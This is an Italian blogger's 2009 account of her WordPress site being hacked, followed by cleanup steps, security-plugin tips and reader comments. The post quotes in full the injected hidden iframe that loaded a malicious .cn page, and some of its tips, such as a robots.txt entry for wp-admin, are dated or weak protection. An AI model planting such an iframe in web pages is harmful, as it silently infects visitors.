IL FATTACCIO
Ho sempre dato scarso peso alla sicurezza del mio blog. Leggevo con interesse riguardo a plugin e precauzioni per tenerlo al sicuro, ma poi pensavo: “Ma figurati se un hacker viene nel mio blog che è piccolino e nato da poco. Gli hacker non se lo inculano il mio blog!”
Detto fatto. Oggi pomeriggio digito il mio url e mi compare un messaggio dell’antivirus (grande NOD32 ti amerò per sempre) che mi dice che il sito contiene un trojan e per sicurezza è stato bloccato. Eh??
Provo a fare un altro tentativo ma niente, l’antivirus continua a bloccare imperterrito. Però mi accorgo anche del fatto che quando tento di accedere al mio url, prima che l’antivirus lo blocchi, avviene una sorta di redirect verso uno strano indirizzo.
Allarmata e sconcertata mi rivolgo all’assistenza del mio hosting che, lesti e professionali come sempre, nel giro di cinque minuti mi confermano l’hackeraggio tramite un iframe e mi segnalano due file modificati nella cartella wp-includes di WordPress.
Da quello che ho capito informandomi sul web, l’hacker ha sfruttato una falla PHP piuttosto comune e ha inserito il seguente codice nel file default-widgets.php:
1 | <iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi73" width=125 height=125 style="visibility: hidden"></iframe> |
In questo modo si apriva una pagina infetta in un iframe situato nella parte alta del mio blog e nascosto agli occhi degli utenti dall’attributo hidden. Fortunatamente il mio antivirus me l’ha prontamente segnalato e me ne sono accorta subito, ma lo scopo di questo tipo di hack è appunto quello di passare inosservato.
Se volete accertarvi che anche il vostro blog non vi riservi spiacevoli sorprese controllatelo con questo ottimo tool online: Unmask Parasites.
LA PULIZIA
Se a qualcuno capitasse o fosse capitata la stessa cosa ecco come ripulire il vostro blog:
- Innanzi tutto una bella scansione anti-virus e anti-malware del pc su cui stiamo lavorando perchè c’è la possibilità che l’hacker sia riuscito a raggiungere anche il vostro computer.
- Una volta che avrete verificato che il pc è pulito cambiate la password FTP.
- Ora potete sostituire i file manomessi con quelli della vostra copia di backup (perchè voi la tenere sempre di scorta una copia di backup vero?!) oppure cancellare le righe aggiunte.
- Rifare una scansione del sito con Unmask Parasites.
- Accertatevi, sempre tramite Unmask Parasites (accanto alla voce Google cliccate il link details) che Google non si sia accorto della vostra infezione. Nel caso l’avesse scoperta richiedete una revisione attraverso il pannelo di Strumenti per i webmaster
LE PRECAUZIONI
Ora che avete ripulito tutto per benino, oppure se non vi siete mai posti il problema che un hacker possa incasinare il sito anche a voi, è giunto il momento di pensare col senno del poi ed installare qualcuno tra i seguenti plugin:
- WordPress DB Backup: Già dal primo istante in cui avete installato il vostro blog WordPress avreste dovuto dotarlo di un plugin per il backup automatico. Se così non fosse però vi consiglio questo che è ottimo e vi permette di ricevere la vostra copia direttamente via email.
- WordPress file monitor: Di vitale importanza in casi come il mio, questo plugin vi segnala se sono stati modificati dei file e quali.
- WP Security Scan: Scansiona il vostro blog alla ricerca di vulnerabilità nella password, nei permessi e nel database. Utilissimo.
- WordPress Firewall Plugin: Il nome dice tutto, un firewall per il vostro blog. Da provare.
- AskApache Password Protect: Questo plugin aggiunge un secondo strato di sicurezza impostando una password anche per la cartell wp-admin. Funziona scrivendo nel file .htaccess e cripta le password in .htpasswd.
- Semisecure Login: Per aumentare la sicurezza nel processo di login al blog, questo plugin usa una cifratura MD5 della password e funziona tramite javascript.
E per finire in bellezza l’opera applichiamo questi due trucchetti segnalati da Guadagnare con un blog:
- Mettete un file index.html in bianco nella cartella /plugins: Questa cartella infatti è accessibile in alcuni casi digitando nomedominio/wp-content/plugins. In questo modo si bloccherà l’accesso facendo visualizzare solo una pagina bianca.
- Bloccate l’accesso a la cartella /wp-admin: Si può fare aggiungendo questa linea di codice al file robots.txt (potete crearlo voi e metterlo nella cartella principale del blog):
1
Disallow: /wp-admin/
19 giugno 2009
Cara Lili, faremo tesoro della tua esperienza! Questi attacchi sono sempre in agguato.
[ Quota ] Respond to elisa
19 giugno 2009
Almeno è servito a qualcosa allora dai
Comunque l’errore è stato in primo luogo mio che ho sottovalutato il fattore sicurezza. Da oggi in poi il mio WordPress sarà una botte di ferro 
[ Quota ] Respond to liliansi
20 giugno 2009
A mali estremi estremi rimedi! Ma anche un tema può avere una falla o addirittura codice malevolo. Ci sono script e plug-in che possono risolvere questo problema!
[ Quota ] Respond to mazzjoe
20 giugno 2009
@mazzjoe: Ma il tema è mio, me lo son costruita da zero…spero proprio che non sia malevolo
[ Quota ] Respond to liliansi
20 giugno 2009
Grazie per aver condiviso la tua esperienza!! Ho del groviera da trasformare al più presto in botte di ferro! Proverò alcuni dei plugin che hai suggerito, grazie ancora! Ciao
[ Quota ] Respond to Fabiola – women Blogging
20 giugno 2009
Non conoscevo il sito Unmask Parasites… ottima dritta. Ma se al posto della index bianca nella cartella plugins metto una index con una frase un po cattivella succede qualcosa?
A parte gli scherzi sono tutti ottimi consigli
[ Quota ] Respond to Nashis
21 giugno 2009
@Fabiola: Se questa esperienza può senrvire a sensibilizzare i blogger a stare più accorti riguardo alla sicurezza, forse è stata fin positiva
@Nashis: Non ci avevo pensato a costruire una pagina con un messaggio
Bella idea bravo, domani mi ci metto. ihihi
[ Quota ] Respond to liliansi
23 giugno 2009
Azz, domani mi mobilito per sistemare la sicurezza del mio blog.
Grazie per la dritta Liliansi!
[ Quota ] Respond to $ax
30 giugno 2009
Post utilissimo!
Mi spiace che per scriverlo tu abbia dovuto smadonnare sulla tua stessa pelle, però vedo che te la sei cavata egregiamente
Roberto
[ Quota ] Respond to Postoditacco
30 giugno 2009
@Postoditacco: Eh ma il merito è dei ragazzi di Hosting per Te…senza di loro ci avrei messo mesi per capire quali file erano stati hackerati
Cmq guardo il lato positivo…ho imparato una lezione. Alla fine poteva andarmi molto peggio 
[ Quota ] Respond to liliansi
30 giugno 2009
Buono a sapersi in ogni caso: se deciderò di cambiare hosting, ne terrò sicuramente conto.
Per ora ho i miei domini su Aruba.
[ Quota ] Respond to Postoditacco
29 gennaio 2010
E’ un articolo molto ben scritto! Per la sezione “precauzioni” penso che una protezione completa da attacchi non sia possibile ma ho trovato un sito http://www.ipsafer.com che permette di eseguire un controllo sugli IP, per sapere se sono pericolosi. Il servizio è GRATUITO e ci sono le istruzioni per modificare wordpress per eseguire il controllo stesso al momento dell’accesso.
[ Quota ] Respond to maspe
29 gennaio 2010
@maspe: Non lo conoscevo! Grazie mille per la dritta
[ Quota ] Respond to liliansi
24 giugno 2010
Windows è ….il più grosso virus in circolazione ….!
Almeno fate 3 cose:
- eliminate i “punti di ripristino” cosi non evitate di rirpistinare anche i virus!
- usate Windows come utente senza privilegi cioè guest invece di usarlo come Administtrator;
- passate a Linux distro “UBUNTU” c’è tanto sw ed è tutto GRATIS.
cIAO E BUONA NOTTE.
[ Quota ] Respond to Alf
18 agosto 2010
QUALE antivirus USI? (grande NOD32)
Ciao, Aldo
[ Quota ] Respond to ALDO
18 agosto 2010
@ALDO: NOD32 appunto..l’ultimaversione l’ESET smart security che comprende anche firewall e anti-malware
[ Quota ] Respond to liliansi